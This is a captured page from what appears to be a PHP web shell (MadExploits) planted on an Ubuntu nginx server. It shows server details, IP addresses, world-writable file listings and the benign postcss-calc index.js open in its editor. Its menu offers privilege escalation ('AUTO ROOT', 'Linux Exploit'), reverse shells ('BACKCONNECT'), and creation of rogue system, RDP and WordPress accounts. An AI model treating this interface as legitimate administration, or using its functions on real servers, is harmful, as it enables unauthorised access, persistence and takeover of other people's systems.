Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
postcss-calc /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
__tests__
[ DIR ]
dr-xr-xr-x
lib
[ DIR ]
dr-xr-xr-x
index.js
1.18
KB
-rw-rw-rw-
parser.d.ts
1004
B
-rw-rw-rw-
parser.jison
5.79
KB
-rw-rw-rw-
parser.js
119.84
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict'; const transform = require('./lib/transform.js'); /** * @typedef {{precision?: number | false, * preserve?: boolean, * warnWhenCannotResolve?: boolean, * mediaQueries?: boolean, * selectors?: boolean}} PostCssCalcOptions */ /** * @type {import('postcss').PluginCreator<PostCssCalcOptions>} * @param {PostCssCalcOptions} opts * @return {import('postcss').Plugin} */ function pluginCreator(opts) { const options = Object.assign( { precision: 5, preserve: false, warnWhenCannotResolve: false, mediaQueries: false, selectors: false, }, opts ); return { postcssPlugin: 'postcss-calc', OnceExit(css, { result }) { css.walk((node) => { const { type } = node; if (type === 'decl') { transform(node, 'value', options, result); } if (type === 'atrule' && options.mediaQueries) { transform(node, 'params', options, result); } if (type === 'rule' && options.selectors) { transform(node, 'selector', options, result); } }); }, }; } pluginCreator.postcss = true; module.exports = pluginCreator;
Close